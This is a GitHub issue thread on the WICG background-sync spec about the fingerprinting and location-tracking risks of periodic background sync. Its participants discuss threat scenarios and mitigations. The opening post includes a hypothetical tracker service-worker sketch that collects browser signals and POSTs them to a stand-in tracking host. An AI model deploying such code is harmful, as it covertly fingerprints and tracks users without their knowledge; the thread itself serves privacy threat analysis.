WICG / background-sync

A design and spec for ServiceWorker-based background synchronization
https://wicg.github.io/background-sync/spec/
Apache License 2.0

Privacy risk: fingerprint updates #168

Open jyasskin opened 4 years ago

jyasskin commented 4 years ago

@ehsan mentioned in https://twitter.com/ehsanakhgari/status/1202982676531159040 that a tracking site might use the periodic execution enabled by a background sync to keep up with gradual fingerprint changes. That is, it's generally easier to build a short-term fingerprint than one that stays stable for a long time. If a user clears a tracking site's cookies, the site wants to have measured a fingerprint as close as possible to the cookie-clearing event in order to maximize the chance that the fingerprint is still the same when the user next visits the site. Background Sync events allow the site to re-measure the fingerprint much closer to the 'clear' than the user's last intentional visit to the site would.
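
As a concrete, purely hypothetical illustration of that attack, a minimal service-worker sketch (the tag name and reporting endpoint are made up; 'periodicsync' is typed loosely because it is not in TypeScript's default lib):

```ts
// sw.ts -- hypothetical tracker service worker.
self.addEventListener('periodicsync', (event: any) => {
  if (event.tag !== 'content-refresh') return; // hypothetical tag
  event.waitUntil(
    (async () => {
      // Re-measure a few signals reachable from worker scope; a real tracker
      // would collect far more.
      const fingerprint = {
        userAgent: navigator.userAgent,
        languages: navigator.languages,
        hardwareConcurrency: navigator.hardwareConcurrency,
        measuredAt: Date.now(),
      };
      await fetch('https://tracker.example/fingerprint', {
        method: 'POST',
        body: JSON.stringify(fingerprint),
      });
    })(),
  );
});
```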

This is mitigated by several considerations:

  1. If the user clears a single site's cookies, the easiest UI to get there is by actually visiting the site, which allows it to measure a fingerprint just before and just after the clear, with no need to take advantage of a background sync. So let's assume the user is clearing the whole browser's cookies.
  2. Some discussion of location tracking mitigations has suggested that periodic syncs might be discarded after the user hasn't engaged with the site for a certain amount of time (see the sketch after this list). I don't see this mentioned in the spec, but it would also decrease the effectiveness of fingerprint updates.
  3. As we work to reduce fingerprintability in general, it may be more feasible to remove access to a fingerprinting vector within a background sync than it would be across the whole web platform. The spec should suggest doing this.
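
A hypothetical sketch of the heuristic in (2), purely for illustration since the spec doesn't define it: the user agent records the last engagement time per origin and drops periodic sync registrations once the origin has gone unvisited for some threshold.

```ts
// Hypothetical user-agent-side heuristic for mitigation (2): keep a periodic
// sync registration only while the user has engaged with its origin recently.
// The 30-day threshold and data shapes are illustrative, not from the spec.
const ENGAGEMENT_TTL_MS = 30 * 24 * 60 * 60 * 1000;

interface PeriodicSyncRegistration {
  origin: string;
  tag: string;
}

function shouldRetainRegistration(
  registration: PeriodicSyncRegistration,
  lastEngagement: Map<string, number>, // origin -> time of last top-level visit
  now: number = Date.now(),
): boolean {
  const last = lastEngagement.get(registration.origin);
  return last !== undefined && now - last < ENGAGEMENT_TTL_MS;
}
```
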
ehsan commented 4 years ago

Hmm, I believe this issue is misrepresenting the actual attack that I had in mind. This isn't about users clearing cookies at all (an activity that the majority of browser users probably never engage in, even though a subset of users may do so regularly). It is, however, about fingerprint evolution as a result of software updates, which applies to all browser users alike. This means that mitigation 1 mentioned above isn't necessarily going to address this issue.

3. As we work to reduce fingerprintability in general, it may be more feasible to remove access to a fingerprinting vector within a background sync than it would be across the whole web platform. The spec should suggest doing this.

And the flip side is that, as browsers keep exposing more APIs to service workers, the practical chances of that mitigation working keep going down.

jyasskin commented 4 years ago

It's possible I'm misunderstanding the goal of fingerprinting here. The FP-STALKER paper you linked says "websites use browser fingerprinting as a way to regenerate deleted cookies", which is the primary use I imagined in the OP. And, of course, in a first-party context with a consistent cookie, there's no point in using fingerprinting to identify the user--you just use the cookie.

But sites might also record a first-party fingerprint in order to match it against a fingerprint they can measure in a third-party context, which matters more as we move to partitioned cookie stores. In that case, I think we'd want to look at how those third-party contexts can link fingerprints as they evolve and whether adding a periodic first-party sync improves that linkability. Background Sync would cause the largest problem when the fingerprint drifts too much between the user's uses of the site (in any context) to be linked on its own, yet the site is used in a first-party context often enough to keep refreshing the BG Sync timeout from (2), so that the last background sync lands close enough to the next third-party use for the fingerprints to be linked again.

Re (3), it's true that as we expose more APIs to service workers, they're likely to become as good at fingerprinting as foreground tabs. I was imagining that we might restrict the APIs available within the periodicsync event to a subset of everything available to service workers in general.

ehsan commented 4 years ago

It's possible I'm misunderstanding the goal of fingerprinting here. The FP-STALKER paper you linked says "websites use browser fingerprinting as a way to regenerate deleted cookies", which is the primary use I imagined in the OP.

Yes, that paper is written assuming that the use case of fingerprint evolution is to handle cookie resurrection. I linked to it because it had investigated the concept and its relationship with updates, in the hopes that it would help clarify my point.

And, of course, in a first-party context with a consistent cookie, there's no point in using fingerprinting to identify the user--you just use the cookie.

There are many other possibilities: for example, if you're looking to identify the user's device (not their browser), so that you can identify their traffic from other browsers/apps on the same device that may not share the same cookie store. Or if you're a surveillance actor who has switched from third-party to first-party cookies for cross-site tracking, and you need a fingerprint in order to join the first-party cookies together. And so on.

But sites might also record a first-party fingerprint in order to match it against a fingerprint they can measure in a third-party context, which is more important as we move to partitioned cookie stores.

Yes, that is another case as well (a special case of the general issue I mentioned above, which is already a prevalent problem on the Web today; there's no need to wait for more browsers to move to partitioned cookie stores).

michaelkleber commented 4 years ago

The threat of noticing a gradual change over time does seem quite relevant to any effort to combat fingerprinting. Sites that a user visits frequently have more of a chance to notice this than sites the user visits only rarely, and from that point of view, Background Sync is a privilege escalation.

I see the explainer already says "Syncing may be less frequent depending on heuristics such as visit frequency & device status", and the draft spec says "The user agent SHOULD limit tracking by capping the number of retries and duration of sync events." There's also a blink-dev discussion about this point of view here.

Those seem like the sorts of mitigations that would cap the privilege escalation. Ehsan, would making those suggestions concrete address the concern, or is there another angle you're after?

ehsan commented 4 years ago

The threat of noticing a gradual change over time does seem quite relevant to any effort to combat fingerprinting. Sites that a user visits frequently have more of a chance to notice this than sites the user visits only rarely, and from that point of view, Background Sync is a privilege escalation.

It took me a while to see how you're considering this a privilege escalation, but I think I see it now. The assumption is that the user visits the app frequently, then the app gets installed, and then it gets to use background sync. Then, as the user keeps using the app (in the installed context), it becomes able to run more and more code in the background invisibly.

But I was under the impression that Chrome allows apps to get installed even after the first time that the user visits them, based on some heuristics that determine whether they can be displayed offline? That's at least what happens on my device: I can install apps on first visit. Would such apps running code in the background also count as privilege escalation, in your opinion?

I see the explainer already says "Syncing may be less frequent depending on heuristics such as visit frequency & device status", and the draft spec says "The user agent SHOULD limit tracking by capping the number of retries and duration of sync events." There's also a blink-dev discussion about this point of view here.

The blink-dev link seems to be broken, unfortunately. I have seen that part in the spec and the explainer. I can't really tell what they mean concretely, and it seems that even following them you can still end up in situations where user data is reported to invisible third parties.

Those seem like the sorts of mitigations that would cap the privilege escalation. Ehsan, would making those suggestions concrete address the concern, or is there another angle you're after?

I'm not after any angles here. I'll allow @jyasskin to decide what he wants to keep track of in his issue.

michaelkleber commented 4 years ago

Sorry, proper blink-dev link.

I don't know the heuristics for either installation or BackgroundSync frequency. They certainly seem relevant to this discussion, and like something that could be adjusted to mitigate risk, so I hope someone knowledgeable will chime in. My hope was that in your example (apps that get "installed even after the first time that the user visits them") they would only get to use BS a handful of times before being cut off. Similarly, letting a site you visit every day perform BS every few hours seems plausibly reasonable.

ehsan commented 4 years ago

I don't know the heuristics for either installation or BackgroundSync frequency.

It seems that this document explains the privacy considerations Chrome has taken with this API. I quote from that document:

"An important threat vector is that the user may desire background sync on one network... but not on another... Unfortunately, we can't do this here, as the product need is to do exactly the opposite."

"So instead, we agreed to additionally gate this functionality on installation, i.e. only allow it for PWAs. Installation should imply persistence of some sorts, in this case the ability to continue syncing in the background, which we still don't want to expose to drive-by web."

(Note here how persistence of the bytes of the installed app is used as a justification for allowing persistent network access, using the word "persistence" in two different contexts with two different meanings).

"Further mitigations have been taken, such as capping the frequency to 2 syncs a day, and observing the site engagement to only maintain registrations for websites the user is actually using."

"Per our (product/permissions/privacy/security) agreement, these mitigations are sufficient; although I still feel that the connection between installed-ness and persistence is not yet sufficiently clear to the user, and we'll need to find ways to improve that in the future."

"Lastly, we have concluded that TWAs may always use periodic background sync (by definition, they're installed; and they don't need to follow the Chrome background sync permission), as the Java part of the app could use such functionality already."

So the gist is that the restrictions applied to you depend on how you get installed: if you get installed on first visit or later, you get to run two background sync events per day for as long as the user keeps using your app. If you get installed before the first visit (through the Play Store), no restrictions are applied to you.
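
For concreteness, a minimal page-side sketch of what requesting periodic background sync looks like under the Chrome behaviour summarised above; the tag and interval are illustrative, and Chrome may still throttle well below what is requested (at most twice a day, and only while site engagement persists).

```ts
// Page-side sketch: request periodic background sync once the service worker
// is ready.
async function registerPeriodicRefresh(): Promise<void> {
  // 'periodic-background-sync' is a Chrome-specific permission name that is
  // not in TypeScript's DOM lib, so the query goes through `any` here.
  const status = await (navigator.permissions as any).query({
    name: 'periodic-background-sync',
  });
  if (status.state !== 'granted') return; // only granted to installed apps

  const registration = await navigator.serviceWorker.ready;
  // `periodicSync` is likewise not in the default TypeScript lib.
  await (registration as any).periodicSync.register('content-refresh', {
    minInterval: 12 * 60 * 60 * 1000, // ask for at most ~2 sync events per day
  });
}
```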

Similarly, letting a site you visit every day perform BS every few hours seems plausibly reasonable.

I disagree. One example to demonstrate that this isn't reasonable: a user installs a popular weather app. They open it once or twice a day to check the weather. The weather app uses background sync to covertly run at times when the user is unlikely to be using their device (e.g. at night while they're asleep). The background pings phone home with location data; across a lot of users, the app tries to correlate that data to find out which users cohabit the same home. And finally, a data breach some time later exposes the extracted information to the public over the Internet.

michaelkleber commented 4 years ago

I think your weather app example is a great one to dig into.

I go to some weather site every day. I go through an install flow, so it's on the home screen of my phone. I give it location permission, because of course weather depends on knowing location.

One way it could use the Background Sync capability is to download the weather just before I typically open the app, so all the info is right there waiting for me. That seems like exactly what I would want an installed weather app to do. I have news and weather apps on my phone that I look at every morning; they behave that way, and it's great UX.
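
As a sketch of that benign use (tag, cache name and endpoint are made up), the service worker could simply refresh a cached forecast on each periodic sync so it is already local when the app is opened:

```ts
// sw.ts -- hypothetical weather-app service worker; 'periodicsync' is typed
// loosely because it is not in TypeScript's default lib.
self.addEventListener('periodicsync', (event: any) => {
  if (event.tag !== 'weather-refresh') return;
  event.waitUntil(
    (async () => {
      const cache = await caches.open('weather-v1');
      // Fetch the latest forecast and overwrite the cached copy the UI reads
      // when the app is opened.
      await cache.add('/api/forecast');
    })(),
  );
});
```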

Another way it could use the Background Sync capability, as you point out, is to run in the background, sometime when I'm not about to open it, request my location, and learn where I spend my time. That means that when I look at the weather every morning, it can tell me what weather to expect for where I just woke up — and also it could tell me about the weather at work, where it's noticed I spend a lot of time. That again feels like just what I would want an app to do, once I had installed it and given it location access.

(You bring up the threat of a later data breach. Sure, maybe I'm worried about that and try to find weather apps whose data retention policy says "We delete your exact locations after a week; beyond that we only retain the general areas you're in frequently, so we can show you the weather there." But that seems beside the point if I'm already willing to grant them permission to see my location.)

So for a user who wants the good weather app experience, what additional signals do you think we should require, beyond the two existing permission grants?